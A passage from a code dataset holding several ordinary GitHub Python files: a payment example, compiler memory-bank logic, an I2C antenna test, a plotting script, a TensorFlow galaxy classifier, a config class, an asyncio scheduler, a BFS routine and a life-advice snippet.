\"paid\"\n \n\norder = Order()\n\norder.add_item(\"Keyboard\", 1, 50)\norder.add_item(\"SSD\", 1, 150)\norder.add_item(\"USB cable\", 2, 5)\nprint(order.total_price())\n\n\nprint(\"\\n Paypal with composition\")\nauthorizer = NotARobot()\nprocessor_paypal = PayPalPaymentProcessor(\"email@email.com\", authorizer)\nauthorizer.not_a_robot()\nprocessor_paypal.pay(order)\n\n","repo_name":"carlosmab/SOLID-python","sub_path":"D_dependency_inversion.py","file_name":"D_dependency_inversion.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3161906279","text":"from collections import deque\nfrom copy import copy\n\nfrom acc_utils.errors import CompilerError\nfrom config import cfg\n\n\nclass Snapshot(object):\n def __init__(self):\n self._reserved_banks = None\n self._available_queue = None\n self._mapping_info = None\n\n def backup(self, fmem_info):\n self._reserved_banks = copy(fmem_info._reserved_banks)\n self._available_queue = copy(fmem_info._available_queue)\n self._mapping_info = copy(fmem_info._mapping_info)\n\n def restore(self, fmem_info):\n fmem_info._reserved_banks = copy(self._reserved_banks)\n fmem_info._available_queue = copy(self._available_queue)\n fmem_info._mapping_info = copy(self._mapping_info)\n\n\nclass FMEMInfo(object):\n def __init__(self):\n self._reserved_banks = set([])\n self._available_queue = deque([i for i in range(cfg.MIDAP.FMEM.NUM)])\n self._mapping_info = []\n self._snapshot = Snapshot()\n\n def backup(self):\n self._snapshot.backup(self)\n\n def restore(self):\n self._snapshot.restore(self)\n\n def discard_data_by_layer(self, name, reverse_order=False):\n discard_list = []\n for idx, data in enumerate(self._mapping_info):\n n = data[0]\n if n == name:\n discard_list.append(idx)\n\n # discard the data in the order used by CIMs. (available_queue)\n for idx in (reversed(discard_list) if reverse_order else discard_list):\n _, bank, _ = self._mapping_info[idx]\n if reverse_order:\n self._available_queue.appendleft(bank)\n else:\n self._available_queue.append(bank)\n self._reserved_banks.discard(bank)\n\n for idx in reversed(discard_list):\n del self._mapping_info[idx]\n\n def discard_data(self, bank):\n discard_idx = -1\n for idx, data in enumerate(self._mapping_info):\n b = data[1]\n if b == bank:\n discard_idx = idx\n break\n\n if bank not in self._reserved_banks:\n self._available_queue.append(bank)\n del self._mapping_info[discard_idx]\n\n def _pop_available_bank(self):\n if not self._available_queue:\n return None\n bank = self._available_queue.popleft()\n return bank\n\n def get_num_available_bank(self):\n return len(self._available_queue)\n\n def get_num_unreserved_bank(self):\n return cfg.MIDAP.FMEM.NUM - len(self._reserved_banks)\n\n def save_data_to_empty_bank(self, layer, data):\n name = layer.name\n\n # FIXME check that data is already in fmem.\n for n, b, d in self._mapping_info:\n if name == n and d == data:\n return None\n\n bank = self._pop_available_bank()\n if bank is not None:\n self._save_data(name, bank, data)\n return bank\n\n def _save_data(self, name, bank, data):\n self._mapping_info.append((name, bank, data))\n\n if len(self._mapping_info) > cfg.MIDAP.FMEM.NUM:\n raise CompilerError(\"Use more banks than exists: \" + str(self._mapping_info) + self.__repr__())\n\n def reverse_mapping(self, name):\n mapping_list = []\n discard_list = []\n for idx, data in enumerate(self._mapping_info):\n n = data[0] if data else None\n if n == name:\n mapping_list.append(data)\n discard_list.append(idx)\n\n for idx in reversed(discard_list):\n del self._mapping_info[idx]\n self._mapping_info = self._mapping_info + list(reversed(mapping_list))\n\n def reserve_input_banks(self, mapping, input_stationary):\n if mapping and input_stationary >= 0:\n banks = [v[0] for v in mapping[:input_stationary]]\n self._reserved_banks = set(banks)\n\n def reserve_output_banks(self, next_layer, output_stationary):\n # FIXME\n # set output bank once per path(or branch)\n for data in self._mapping_info:\n n = data[0] if data else None\n if n == next_layer.name:\n return\n\n fragments = next_layer.get_output_fragments(cfg.MIDAP.FMEM.NUM - 1)\n for f in fragments[:output_stationary]:\n bank = self.save_data_to_empty_bank(next_layer, f)\n if bank is None:\n raise CompilerError(\"There is no bank to save output of \" + next_layer.name + \" \" + self.__repr__())\n self._reserved_banks.add(bank)\n\n def get_fmem_mapping_info(self, name):\n mapping = []\n for data in self._mapping_info:\n n = data[0] if data else None\n if n == name:\n mapping.append([data[1], data[2], False])\n return mapping\n\n def __repr__(self):\n usage = ['O'] * cfg.MIDAP.FMEM.NUM\n for data in self._mapping_info:\n usage[data[1]] = data[0]\n return \"FMEM Available Bank {}\".format(usage)\n","repo_name":"cap-lab/MidapSim","sub_path":"midap_software/fmem_info.py","file_name":"fmem_info.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"12298259847","text":"from pyftdi import i2c\nfrom time import sleep\n\n# Commands without parameters and response\ninitial_commands = [\n b\"\\xAA\", # RESET\n b\"\\xAC\", # DISARM\n b\"\\xAD\", # ARM ANTENNA SYSTEM\n b\"\\xA9\", # CANCEL DEPLOY SYSTEM ACTIVATION\n]\n\n# Commands with parameters but with no response\ndeploy_commands = [\n b\"\\xA1\", # DEPLOY ANTENNA 1\n b\"\\xA2\", # DEPLOY ANTENNA 2\n b\"\\xA3\", # DEPLOY ANTENNA 3\n b\"\\xA4\", # DEPLOY ANTENNA 4\n b\"\\xA5\", # DEPLOY SEQUENCIAL\n b\"\\xBA\", # DEPLOY ANTENNA 1 OVERRIDE\n b\"\\xBB\", # DEPLOY ANTENNA 2 OVERRIDE\n b\"\\xBC\", # DEPLOY ANTENNA 3 OVERRIDE\n b\"\\xBD\", # DEPLOY ANTENNA 4 OVERRIDE\n]\n\n# Commands with 2 byte responses and no parameters\nreport_2b_commands = [\n b\"\\xB4\", # REPORT DEPLOY TIME 1\n b\"\\xB5\", # REPORT DEPLOY TIME 2\n b\"\\xB6\", # REPORT DEPLOY TIME 3\n b\"\\xB7\", # REPORT DEPLOY TIME 4\n b\"\\xC3\", # REPORT DEPLOYMENT STATUS\n b\"\\xC0\", # MEASURE TEMPERATURE\n]\n\n# Commands with 1 byte responses and no parameters\nreport_1b_commands = [\n b\"\\xB0\", # REPORT DEPLOY COUNTER 1\n b\"\\xB1\", # REPORT DEPLOY COUNTER 2\n b\"\\xB2\", # REPORT DEPLOY COUNTER 3\n b\"\\xB3\", # REPORT DEPLOY COUNTER 4\n]\n\n# Responses for report_2b_commands\nresponses_2b: list[str] = [\n \"Should return deploy_timer_1 | 0x02 0x00\",\n \"Should return deploy_timer_2 | 0x02 0x00\",\n \"Should return deploy_timer_3 | 0x02 0x00\",\n \"Should return deploy_timer_4 | 0x02 0x00\",\n \"Should return deploy_status | 0xFF 0xFF\",\n \"Should return 11 bits of temperature | 0x03 0xFF\",\n]\n\n# Responses for report_1b_commands\nresponses_1b: list[str] = [\n \"Should return deploy_counter_1 | 0x02\",\n \"Should return deploy_counter_2 | 0x02\",\n \"Should return deploy_counter_3 | 0x02\",\n \"Should return deploy_counter_4 | 0x02\",\n]\n\nctrl = i2c.I2cController()\n\n# Mudar para o valor real\nctrl.configure(\"ftdi:232h\")\n\nport = ctrl.get_port(0x31)\n\ntry: \n# TESTING COMMANDS WITHOUT PARAMETERS/RESPONSE\n for cmd in initial_commands:\n print(f\"Data transmitted from master via i2c: {cmd}\")\n port.write(cmd)\n sleep(10)\n\n# TESTING COMMANDS WITHOUT RESPONSE, BUT WITH PARAMETERS\n for cmd in deploy_commands:\n print(f\"Data transmitted from master via i2c: {cmd}\")\n port.write(cmd, relax=False)\n port.write(cmd)\n sleep(10)\n\n# TESTING COMMANDS WITHOUT PARAMETERS, BUT WITH 1 BYTE RESPONSE\n for idx, cmd in enumerate(report_1b_commands):\n rx = port.exchange(cmd)\n print(f\"{responses_1b[idx]}, actual response is {rx}\")\n sleep(10)\n\n# TESTING COMMANDS WITHOUT PARAMETERS, BUT WITH 2 BYTE RESPONSE\n for idx, cmd in enumerate(report_2b_commands):\n port.write(cmd)\n rx = port.read(2)\n print(f\"{responses_2b[idx]}, actual response is {rx}\")\n sleep(10)\n\nexcept: \n print(\"Something went wrong in communication\")\n ctrl.terminate()\n","repo_name":"c-porto/i2c-test","sub_path":"ftdi-client/simulated.py","file_name":"simulated.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37507761632","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nNUM_INTERVALS = 100\n\narr = np.loadtxt(\"uni.dat\", dtype=\"double\")\n\nbuckets = np.linspace(-2, 3, num=NUM_INTERVALS)\nfreqs = []\n\ndef pdf(x):\n if x > 0 and x < 1:\n return 1\n else:\n return 0\n\nvf = np.vectorize(pdf)\n\n# theoretical = np.where(np.logical_and(buckets > 0, buckets < 1), 1, 0)\ntheoretical = vf(buckets)\n\nfor i in range(NUM_INTERVALS):\n freqs.append(np.sum(arr < buckets[i]) / len(arr))\n\nslopes = []\n\nfor i in range(NUM_INTERVALS - 1):\n slopes.append((freqs[i+1] - freqs[i]) / (buckets[i+1] - buckets[i]))\n\nplt.plot(buckets[:-1], slopes, 'o', label='Experimental')\nplt.plot(buckets, theoretical, '-', label='Theoretical')\nplt.legend()\nplt.grid()\nplt.savefig('../figs/pdf_uni.png')\nplt.show()\n","repo_name":"kst164/AI1110-Assignments","sub_path":"rand_nums/codes/pdf_uni.py","file_name":"pdf_uni.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70165309704","text":"import logging\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.layers import (Conv2D, Dense, Dropout, Flatten,\n MaxPooling2D)\nfrom tensorflow.keras.metrics import CosineSimilarity\nfrom tensorflow.keras.models import Sequential, model_from_json\nfrom tensorflow.keras.optimizers import Adadelta\n\nfrom src.data.model_data_set import ModelDataset\nfrom src.model.model_constants import DATA_LABELS\nfrom src.model.get_ROC_curve import get_ROC_curve\nfrom src.model.get_confusion_matrix import get_confusion_matrix\n\nlogger = logging.getLogger(__name__)\n\nclass GalaxyModel:\n def __init__(self, model_info, config):\n self.model_info = model_info\n self.config = config\n self.model_data_set = ModelDataset(model_info, config)\n self.model = None\n\n def get_new_model(self):\n raise NotImplementedError\n\n def compile_model(self):\n raise NotImplementedError\n\n def load_model(self):\n model_directory = Path(self.config[\"model_path\"])\n model_name = self.model_info.model_name\n\n self.model = tf.keras.models.load_model(str(model_directory/model_name))\n return self.model\n\n def save_model(self):\n if self.model is None:\n raise ValueError(\"No model is defined\")\n\n model_directory = self.config[\"model_path\"]\n model_name = self.model_info.model_name\n \n save_path = Path(model_directory) / model_name\n\n self.model.save(str(save_path))\n\n def _get_training_callbacks(self, callbacks):\n _callbacks = []\n\n if callbacks is not None:\n for callback in callbacks:\n _callbacks.append(callback)\n\n model_name = self.model_info.model_name\n enable_tensorboard = self.config.get('enable_tensorboard', False)\n enable_early_stopping = self.config.get('enable_earlystopping', False)\n\n if enable_tensorboard:\n # Setup tensorboard logs\n log_dir = Path(self.config.get('log_dir', 'logs/fit'))\n \n today_date_time_str = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n log_dir=log_dir / f\"{model_name}-{today_date_time_str}\"\n\n _callbacks.append(\n tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1, profile_batch=0)\n )\n if enable_early_stopping:\n _callbacks.append(\n tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5)\n )\n \n return _callbacks\n\n def train(self, train_data_set, validation_data_set, callbacks=None):\n epochs = self.config[\"epochs\"]\n callbacks = self._get_training_callbacks(callbacks)\n \n return self.model.fit(\n train_data_set,\n steps_per_epoch=50,\n epochs=epochs,\n validation_data=validation_data_set,\n validation_steps=50,\n verbose=0,\n callbacks=callbacks\n )\n\nclass GalaxyModelClassifier(GalaxyModel):\n def get_new_model(self):\n # Get model parameters\n image_height = self.config[\"image_height\"]\n image_width = self.config[\"image_width\"]\n image_channels = self.model_info.model_config.get(\"numChannels\")\n \n # Build model architecture\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=(image_height, image_width, image_channels)))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(len(DATA_LABELS), activation='softmax'))\n\n # return model\n self.model = model\n\n def compile_model(self):\n if self.model is None:\n raise ValueError(\"No model is defined\")\n\n self.model.compile(\n loss=tf.keras.losses.categorical_crossentropy,\n optimizer=Adadelta(),\n metrics=['MSE', 'accuracy', 'AUC']\n )\n\n def _get_predictions(self, testing_data_set):\n predict, correct = [], []\n predict_scores, correct_scores = [], []\n \n for image, label in testing_data_set:\n predictions = self.model.predict(image)\n\n for i in range(predictions.shape[0]):\n predict.append(np.argmax(predictions[i]))\n correct.append(np.argmax(label[i]))\n\n predict_scores.append(predictions[i])\n correct_scores.append(label[i])\n\n return (predict, predict_scores, correct, correct_scores)\n\n def evaluate_model(self, testing_data_set, ex):\n if self.model is None:\n raise ValueError(\"No model is defined\")\n\n predict, predict_scores, correct, correct_scores = self._get_predictions(testing_data_set)\n\n ROC_curve = get_ROC_curve(predict_scores, correct_scores)\n conf_mtrx = get_confusion_matrix(predict, correct)\n\n ex.add_artifact(ROC_curve.name, name=\"ROC_Curve.png\", content_type=\"image/png\")\n ex.add_artifact(conf_mtrx.name, name=\"Confusion_Matrix.png\", content_type=\"image/png\")\n\n ROC_curve.close()\n conf_mtrx.close()\n\nif __name__==\"__main__\":\n from src.config.load_workbook import load_workbook\n from src.config.load_config import load_config\n from src.model.model_info import ModelInfo\n \n config = load_config(\"config.yml\")\n config[\"epochs\"] = 10\n model_config_dict, data_files_dict = load_workbook(config)\n\n model_info = ModelInfo(\"2_channel_categorical_gas_density_star_density_m1m2m3\", model_config_dict, data_files_dict)\n\n m = GalaxyModelClassifier(model_info, config)\n\n m.get_new_model()\n m.compile_model()\n \n t, tr, v = m.model_data_set.load_model_data_set()\n\n m.train(tr, v)\n","repo_name":"asafsilman/GalaxyEnvironmentAnalysis","sub_path":"src/model/galaxy_model.py","file_name":"galaxy_model.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13714477599","text":"import json\nimport logging\nfrom abc import ABC, abstractmethod\nfrom pathlib import Path\nfrom typing import Dict, List, Optional, Tuple, Union\n\nfrom gtmcore.data.config.err.configurationfilenotcreated import \\\n ConfigurationFileNotCreated\n\nConfigValueType = Optional[Union[int, str, float, bool, Dict, List, Tuple]]\n\n\nclass BaseConfiguration(ABC):\n \"\"\" The class responsible for creating and loading a per service configuration.\n \"\"\"\n\n def __init__(self) -> None:\n self.config_path: Path = Path(\n \"config/\" + self.get_config_module_str() + \"/settings.json\").absolute()\n self.__config: Dict[str, ConfigValueType] = {}\n if not self.check_config_file_exists():\n self.create_config_file()\n logging.info(\"[GTMCORE] The configuration file for module '%s' has been created.\",\n self.get_config_module_str())\n self.load_config()\n\n def check_config_file_exists(self) -> bool:\n \"\"\" Checks if there is an existing configuration file in the service config path.\n\n Returns:\n bool: If the config file has been found or not.\n \"\"\"\n try:\n return self.config_path.is_file()\n except OSError:\n return False\n\n def create_config_file(self) -> None:\n \"\"\" Creates or recreates the configuration file with the default template.\n\n Raises:\n ConfigurationFileNotCreated: Thrown when the configuration file could not be created.\n \"\"\"\n try:\n config_template: dict = self.get_config_template()\n self.config_path.parent.mkdir(parents=True, exist_ok=True)\n with self.config_path.open(\"w+\", encoding=\"utf-8\") as config_file:\n json.dump(config_template, config_file, indent=4)\n except OSError as err:\n raise ConfigurationFileNotCreated(\n f\"The configuration file for '{self.get_config_module_str()}'\"\n \" could not be created\"\n ) from err\n\n def load_config(self):\n \"\"\" Loads the keys and values from the configuration file.\n \"\"\"\n with self.config_path.open(\"r\", encoding=\"utf-8\") as config_file:\n self.__config = json.load(config_file)\n\n def get_config(self) -> Dict[str, ConfigValueType]:\n \"\"\" Gets the dictionary with all the configuration keys and values.\n\n Returns:\n Dict[str, ConfigValueType]: A dictionary with all the configuration keys and values.\n \"\"\"\n return self.__config\n\n def get_value(self, key: str) -> Optional[ConfigValueType]:\n \"\"\" Gets the value associated with the key in the configuration file.\n\n Args:\n key (str): The key from the configuration file.\n\n Returns:\n Optional[ConfigValueType]: The value associated with the key or None if not found.\n \"\"\"\n try:\n return self.__config.get(key)\n except KeyError:\n return None\n\n def set_value(self, key: str, value: ConfigValueType) -> None:\n \"\"\" Sets the value associated with the key in the configuration.\n\n Args:\n key (str): The key of the configuration paramether.\n value (ConfigValueType): The value of the configuration paramether.\n\n Raises:\n TypeError: Thrown when the configuration file could not be created.\n \"\"\"\n try:\n self.__config[key] = value\n except TypeError as err:\n raise TypeError(\n f\"Incorrect value detected for key '{key}'\" +\n f\"at configuration file for '{self.get_config_module_str()}'.\") from err\n\n @abstractmethod\n def get_config_template(self) -> Dict[str, ConfigValueType]:\n \"\"\" Gets the template of the configuration file.\n\n Returns:\n Dict[str, ConfigValueType]: Dictionary with the configuration file format.\n \"\"\"\n return {}\n\n @abstractmethod\n def get_config_module_str(self) -> str:\n \"\"\" Gets the configuration module name string.\n\n Returns:\n str: The configuration module name string.\n \"\"\"\n return \"\"\n","repo_name":"MrpYA45/github-text-mining-tfg","sub_path":"src/backend/gtmcore/gtmcore/data/config/baseconfiguration.py","file_name":"baseconfiguration.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"9680795619","text":"import asyncio\nimport logging\nfrom datetime import datetime, timedelta\nfrom typing import Callable, Optional\nfrom easyschedule.cron import get_schedule_delay\n\nclass EasyScheduler:\n def __init__(\n self,\n logger: Optional[logging.Logger] = None,\n debug: Optional[bool] = False\n ):\n self.scheduled_tasks = {}\n self.single_tasks = []\n self.loop = None\n ## logging\n level = 'DEBUG' if debug else None\n self.setup_logger(logger=logger, level=level)\n \n def setup_logger(\n self, \n logger: logging.Logger = None, \n level: str = None\n ) -> None:\n if logger == None:\n level = logging.DEBUG if level == 'DEBUG' else logging.WARNING\n logging.basicConfig(\n level=level,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M:%S'\n )\n self.log = logging.getLogger(f'EasyScheduler')\n self.log.propogate = False\n else:\n self.log = logger\n def __call__(\n self,\n schedule: str,\n default_args: dict = {'args': [], 'kwargs': {}}\n ) -> Callable:\n if not 'args' in default_args:\n default_args['args'] = []\n if not 'kwargs' in default_args: \n default_args['kwargs'] = {}\n def scheduler(func):\n async def scheduled(*args, **kwargs):\n result = func(*args, **kwargs)\n if asyncio.iscoroutine(result):\n result = await result\n return result\n scheduled.__name__ = func.__name__\n self.scheduled_tasks[scheduled.__name__] = {\n 'func': scheduled,\n 'schedule': schedule,\n 'default_args': default_args\n }\n if self.loop:\n self.schedule_task(scheduled.__name__)\n return func\n return scheduler\n def schedule(\n self, \n task: Callable, \n schedule: str,\n default_args: dict = {}\n ):\n \"\"\"\n schedule a recurring task \n \"\"\"\n self(schedule=schedule, default_args=default_args)(task)\n def run_once(\n self,\n func: Callable,\n date: Optional[datetime] = None,\n date_string: Optional[str] = None,\n delta: Optional[timedelta] = None,\n now: Optional[bool] = False,\n on_event: Optional[str] = None,\n default_args: Optional[dict] = None,\n ):\n time_now = datetime.now()\n delay = None\n if date and date >= time_now:\n delay = date - time_now\n if date_string:\n date = datetime.fromisoformat(date_string)\n if date >= time_now:\n delay = date - time_now\n if delta:\n if not isinstance(delta, timedelta):\n raise Exception(f\"delta is type {type(delta)}, expected {timedelta}\")\n delay = delta.total_seconds()\n if now:\n delay = datetime.now() - time_now\n if isinstance(delay, timedelta):\n delay = delay.total_seconds()\n\n if not default_args:\n default_args = {}\n if not 'args' in default_args:\n default_args['args'] = []\n if not 'kwargs' in default_args:\n default_args['kwargs'] = {}\n\n if on_event and on_event == 'shutdown':\n async def shutdown_task():\n try:\n while True:\n await asyncio.sleep(60)\n except asyncio.CancelledError:\n time_now = datetime.now()\n self.log.warning(f\"shutdown task {func.__name__} triggered at {time_now}\")\n try:\n await func(*default_args['args'], **default_args['kwargs'])\n except Exception as e:\n self.log.exception(f\"error running shutdown task - {task}\")\n return\n\n if self.loop:\n asyncio.create_task(shutdown_task())\n else:\n self.single_tasks.append(shutdown_task)\n return\n \n async def single_task():\n try:\n run_time = time_now + timedelta(seconds=delay)\n self.log.warning(f\"single task {func.__name__} scheduled to run at {run_time} in {delay} s\")\n await asyncio.sleep(delay)\n try:\n await func(*default_args['args'], **default_args['kwargs'])\n except Exception as e:\n if isinstance(e, asyncio.CancelledError):\n raise e\n self.log.exception(f\"error running single task - {func.__name__}\")\n except asyncio.CancelledError:\n return\n \n if self.loop:\n asyncio.create_task(single_task())\n else:\n self.single_tasks.append(single_task)\n return\n def once(\n self,\n date: Optional[datetime] = None,\n date_string: Optional[str] = None,\n delta: Optional[timedelta] = None,\n now: Optional[bool] = False,\n default_args: Optional[dict] = None\n ):\n \"\"\"\n Decoractor\n runs a single task at at input date, date_string, delta, now \n \"\"\"\n def once_decorator(func):\n self.run_once(\n func,\n date=date,\n date_string=date_string,\n delta=delta,\n now=now,\n default_args=default_args\n )\n return func\n return once_decorator\n def startup(\n self,\n default_args: Optional[dict] = None\n ) -> Callable:\n \"\"\"\n decorator\n runs a single task right after scheduler.start()\n Optional:\n default_args = {'args': [], 'kwargs': {}}\n \"\"\"\n if self.loop and self.loop.is_running():\n raise Exception(f\"scheduler has already started - cannot add startup tasks\")\n def startup_decor(func):\n\n self.run_once(\n func,\n now=True,\n default_args=default_args\n )\n return func\n return startup_decor \n def delayed_start(\n self,\n delay_in_seconds: int = 60,\n default_args: Optional[dict] = None\n ): \n \"\"\"\n decorator\n runs a single task after scheduler.start() with a delay\n \n delay_in_seconds: int = 60 #Default\n Optional:\n default_args = {'args': [], 'kwargs': {}}\n \"\"\"\n def delayed_start_decor(func):\n self.run_once(\n func,\n delta=timedelta(seconds=delay_in_seconds),\n default_args=default_args\n )\n return func\n return delayed_start_decor\n def shutdown(\n self,\n default_args: Optional[dict] = None\n ):\n \"\"\"\n decorator\n runs a single task after shutdown is detected\n \n Optional:\n default_args = {'args': [], 'kwargs': {}}\n \"\"\"\n def shutdown_decor(func):\n self.run_once(\n func,\n default_args=default_args,\n on_event='shutdown'\n )\n return func\n return shutdown_decor\n \n \n def schedule_task(self, task: str) -> None:\n async def scheduled_task():\n try:\n while True:\n func = self.scheduled_tasks[task]['func']\n schedule = self.scheduled_tasks[task]['schedule']\n default_args = self.scheduled_tasks[task]['default_args']\n next_run_time, delay = get_schedule_delay(schedule)\n self.log.warning(f\"{task} next_run_time: {next_run_time} - default_args: {default_args}\")\n await asyncio.sleep(delay)\n try:\n await func(*default_args['args'], **default_args['kwargs'])\n except Exception as e:\n self.log.exception(f\"error running scheduled task - {task}\")\n except asyncio.CancelledError:\n return\n self.log.debug(f\"schedule_task called for {self.scheduled_tasks[task]}\")\n self.scheduled_tasks[task]['task'] = self.loop.create_task(\n scheduled_task()\n )\n async def start(self):\n if not self.loop:\n self.loop = asyncio.get_running_loop()\n for task in self.scheduled_tasks:\n self.schedule_task(task)\n for task in self.single_tasks:\n asyncio.create_task(task())\n try:\n while True:\n await asyncio.sleep(60)\n except asyncio.CancelledError:\n return","repo_name":"codemation/easyschedule","sub_path":"easyschedule/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"70015070344","text":"# S is index, G is adjacancy list\n# finds distance from S to all verticies in G\ndef bfs(S, G):\n q = [S]\n INF = 10**18\n dist = [INF]*len(G)\n dist[S] = 0\n while q:\n q2 = []\n for u in q:\n for v in G[u]: \n # early break here if only interesed in length of S -> T path.\n if dist[u] + 1 < dist[v]:\n dist[v] = dist[u] + 1\n q2.append(v)\n q = q2\n return dist","repo_name":"exoji2e/notebook","sub_path":"src/graphs/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"81"} +{"seq_id":"20639592082","text":"from blastermodel import blasterModel \nfrom Jacobian_POC_Solver import Jacobian_POC_Solver\nimport numpy as np\nimport time\nfrom matplotlib import pyplot as plt\nfrom casadi import *\n\nif __name__ == \"__main__\":\n\n # GENERATE REQUIRED CONTROLLER AND INTEGRATOR\n\n mass = 9.0\n J = np.eye(3)\n J[0, 0] = 0.50781\n J[1, 1] = 0.47314\n J[2, 2] = 0.72975\n l_x = 0.3434 \n l_y = 0.3475\n N = 60\n Tf = 2.0\n yaw_coefficient = 0.03\n blastThruster = 2.2*9.81\n Q = np.zeros((17, 17))\n np.fill_diagonal(Q, [1e3, 1e3, 1e3, 1e3, 1e3, 1e3, 0.5e1, 0.5e1, 0.5e1, 1e1, 1e1, 1e1, 1e-2, 1e-2, 1e3, 1e3, 1e3]) # position, euler, velocity, angular velocity, swivel angles, POC.\n Q_t = 10*Q\n R = np.zeros((6, 6))\n np.fill_diagonal(R, [5e-2, 5e-2, 5e-2, 5e-2, 1e-5, 1e-5])\n statesBound = np.array([[-1.5, -1.5, 0, -0.174532925, -0.174532925, -0.349066, -1.0, -1.0, -1.0, -0.0872665, -0.0872665, -0.0872665, -0.174532925, -0.523599, -1.5, -1.5, -2.5],\n [1.5, 1.5, 5.0, 0.174532925, 0.174532925, 0.349066, 1.0, 1.0, 1.0, 0.0872665, 0.0872665, 0.0872665, 1.22173, 0.523599, 1.5, 1.5, 2.5]])\n controlBound = np.array([[0, 0, 0, 0, -0.0872665, -0.0872665], [65, 65, 65, 65, 0.0872665, 0.0872665]])\n b = blasterModel(mass, J, l_x, l_y, N, Tf, yaw_coefficient, Q, R, Q_t, blastThruster, statesBound, controlBound)\n b.generateModel()\n integrator, ocp_solver = b.generateController()\n\n # GENERATE SIMULATION PARAMETERS\n\n solver = Jacobian_POC_Solver(150, 1, 0.000015)\n solver.initialise()\n J_mot, J_eul, J_pos = solver.getJacobians()\n \n nx = 17 \n nu = 6\n Nsim = 500\n simX = np.ndarray((Nsim+1, nx))\n simU = np.ndarray((Nsim, nu))\n\n x0 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n yref = np.array([0.0, 0.0, 3.5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.0, 0, 0, 0, 0, 0.0, 0, 0])\n t = np.linspace(0, Tf/N*Nsim, Nsim+1)\n simX[0, :] = x0\n\n xcurrent = x0 \n \n # u = np.array([17, 17, 17, 17, 0.0, -0.05])\n\n for i in range(Nsim): \n\n t0 = time.time()\n\n ocp_solver.set(0, \"lbx\", xcurrent)\n ocp_solver.set(0, \"ubx\", xcurrent)\n\n ocp_solver.cost_set(0, 'yref', yref)\n \n for k in range(N):\n \n params = np.vstack((np.reshape(J_mot, (J_mot.size, 1), order='F'), np.reshape(J_eul, (J_eul.size, 1), order='F'), np.reshape(J_pos, (J_pos.size, 1), order='F'), blastThruster))\n\n ocp_solver.set(k, 'p', params)\n \n\n if k+1 == N: \n\n ocp_solver.cost_set(k+1, 'yref', yref[0:nx])\n\n else: \n\n ocp_solver.cost_set(k+1, 'yref', yref)\n\n status = ocp_solver.solve()\n\n params = np.vstack((np.reshape(J_mot, (J_mot.size, 1), order='F'), np.reshape(J_eul, (J_eul.size, 1), order='F'), np.reshape(J_pos, (J_pos.size, 1), order='F'), 2.2*9.81))\n\n integrator.set('p', params)\n print(xcurrent)\n print(ocp_solver.get_cost())\n print(ocp_solver.get(0, \"u\"))\n\n simU[i,:] = ocp_solver.get(0, \"u\")\n\n # u = np.array([])\n\n # simulate system\n integrator.set(\"x\", xcurrent)\n integrator.set(\"u\", simU[i,:])\n # integrator.set(\"u\", u)\n # integrator.set(\"u\", np.array([22.0725, 22.0725, 22.0725, 22.0725, 0, 0]))\n\n status = integrator.solve()\n if status != 0:\n raise Exception('acados integrator returned status {}. Exiting.'.format(status))\n\n # update state\n xcurrent = integrator.get(\"x\")\n simX[i+1,:] = xcurrent\n\n print(f\"Time per step: {time.time() - t0}\")\n\n plt.plot(t, simX[:, 0], label='x')\n plt.plot(t, simX[:, 1], label='y')\n plt.plot(t, simX[:, 2], label='z')\n plt.legend()\n plt.show()\n plt.plot(t, simX[:, 14], label='POC_{x}')\n plt.plot(t, simX[:, 15], label='POC_{y}')\n plt.plot(t, simX[:, 16], label='POC_{z}')\n plt.legend()\n plt.show()\n\n plt.plot(t, simX[:, 3], label='phi')\n plt.plot(t, simX[:, 4], label='tetha')\n plt.plot(t, simX[:, 5], label='psi')\n plt.legend()\n plt.show()\n\n plt.plot(t, simX[:, 12], label='alpha1')\n plt.plot(t, simX[:, 13], label='alpha2')\n plt.legend()\n plt.show()","repo_name":"sml93/mpc_blaster","sub_path":"src/scripts/simulation_blaster.py","file_name":"simulation_blaster.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29817282971","text":"import random\n\ndef getLifeAdvice(type, seed=None) :\n '''\n Returns a randomized piece of life advice if the second given argument is life advice\n '''\n learning = [\n \"Whatever you do, give it 100%\",\n \"Never stop learning\",\n \"Your thinking changes your life\",\n \"Be kind to people; treat people as you'd like to be treated\",\n \"Starting is the hardest part\"\n ]\n\n detach = [\n \"Forgive and let go\",\n \"You 